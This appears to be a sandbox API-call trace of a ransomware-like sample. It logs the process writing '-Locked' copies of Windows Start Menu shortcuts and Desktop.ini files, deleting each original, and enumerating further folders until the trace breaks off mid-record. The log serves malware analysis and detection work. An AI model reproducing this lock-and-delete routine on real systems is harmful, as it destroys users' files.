[0300.067] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.067] GetFileType (hFile=0x49c) returned 0x1 [0300.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.067] GetFileType (hFile=0x49c) returned 0x1 [0300.069] CloseHandle (hObject=0x49c) returned 1 [0300.069] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk", lpFilePart=0x0) returned 0x61 [0300.069] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk")) returned 1 [0300.070] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk-Locked", lpFilePart=0x0) returned 0x65 [0300.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.070] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.075] GetFileType (hFile=0x49c) returned 0x1 [0300.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.075] GetFileType (hFile=0x49c) returned 0x1 [0300.076] CloseHandle (hObject=0x49c) returned 1 [0300.077] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk", lpFilePart=0x0) returned 0x5e [0300.077] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk")) returned 1 [0300.079] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Resource Monitor.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Resource Monitor.lnk-Locked", lpFilePart=0x0) returned 0x65 [0300.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.079] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Resource Monitor.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\resource monitor.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.080] GetFileType (hFile=0x49c) returned 0x1 [0300.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.080] GetFileType (hFile=0x49c) returned 0x1 [0300.082] CloseHandle (hObject=0x49c) returned 1 [0300.082] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Resource Monitor.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Resource Monitor.lnk", lpFilePart=0x0) returned 0x5e [0300.082] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\resource monitor.lnk")) returned 1 [0300.083] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk-Locked", lpFilePart=0x0) returned 0x76 [0300.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.083] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.083] GetFileType (hFile=0x49c) returned 0x1 [0300.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.083] GetFileType (hFile=0x49c) returned 0x1 [0300.086] CloseHandle (hObject=0x49c) returned 1 [0300.086] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk", lpFilePart=0x0) returned 0x6f [0300.086] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk")) returned 1 [0300.087] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk-Locked", lpFilePart=0x0) returned 0x5d [0300.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.088] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.089] GetFileType (hFile=0x49c) returned 0x1 [0300.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.089] GetFileType (hFile=0x49c) returned 0x1 [0300.091] CloseHandle (hObject=0x49c) returned 1 [0300.091] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk", lpFilePart=0x0) returned 0x56 [0300.091] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk")) returned 1 [0300.093] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk-Locked", lpFilePart=0x0) returned 0x69 [0300.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.093] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.094] GetFileType (hFile=0x49c) returned 0x1 [0300.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.094] GetFileType (hFile=0x49c) returned 0x1 [0300.095] CloseHandle (hObject=0x49c) returned 1 [0300.096] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk", lpFilePart=0x0) returned 0x62 [0300.096] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk")) returned 1 [0300.099] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Information.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Information.lnk-Locked", lpFilePart=0x0) returned 0x67 [0300.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.099] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Information.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system information.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.100] GetFileType (hFile=0x49c) returned 0x1 [0300.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.100] GetFileType (hFile=0x49c) returned 0x1 [0300.102] CloseHandle (hObject=0x49c) returned 1 [0300.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Information.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Information.lnk", lpFilePart=0x0) returned 0x60 [0300.102] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system information.lnk")) returned 1 [0300.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk-Locked", lpFilePart=0x0) returned 0x63 [0300.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.103] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.103] GetFileType (hFile=0x49c) returned 0x1 [0300.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.103] GetFileType (hFile=0x49c) returned 0x1 [0300.105] CloseHandle (hObject=0x49c) returned 1 [0300.105] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk", lpFilePart=0x0) returned 0x5c [0300.105] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk")) returned 1 [0300.107] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk-Locked", lpFilePart=0x0) returned 0x7c [0300.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.107] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.112] GetFileType (hFile=0x49c) returned 0x1 [0300.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.112] GetFileType (hFile=0x49c) returned 0x1 [0300.114] CloseHandle (hObject=0x49c) returned 1 [0300.114] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk", lpFilePart=0x0) returned 0x75 [0300.114] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk")) returned 1 [0300.115] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", lpFilePart=0x0) returned 0x40 [0300.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.115] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", lpFilePart=0x0) returned 0x40 [0300.115] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpFilePart=0x0) returned 0x41 [0300.115] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.115] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.116] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97389110, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97389110, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0300.116] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.116] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.116] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", lpFilePart=0x0) returned 0x40 [0300.117] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpFilePart=0x0) returned 0x41 [0300.117] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97389110, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97389110, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0300.118] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97389110, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97389110, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 0 [0300.118] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.118] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini-Locked", lpFilePart=0x0) returned 0x53 [0300.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.118] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.119] GetFileType (hFile=0x49c) returned 0x1 [0300.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.119] GetFileType (hFile=0x49c) returned 0x1 [0300.121] CloseHandle (hObject=0x49c) returned 1 [0300.121] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini", lpFilePart=0x0) returned 0x4c [0300.121] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 1 [0300.147] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools", lpFilePart=0x0) returned 0x50 [0300.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.148] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools", lpFilePart=0x0) returned 0x50 [0300.148] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\", lpFilePart=0x0) returned 0x51 [0300.148] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.149] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d1e040, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x91d1e040, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91e8d725, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa37, dwReserved0=0x0, dwReserved1=0x0, cFileName="Database Compare 2016.lnk", cAlternateFileName="DATABA~1.LNK")) returned 1 [0300.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x923c7ef9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x923c7ef9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x925326a4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office 2016 Language Preferences.lnk", cAlternateFileName="OFFICE~1.LNK")) returned 1 [0300.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9261f39f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9261f39f, ftLastAccessTime.dwHighDateTime=0x1d705ed, 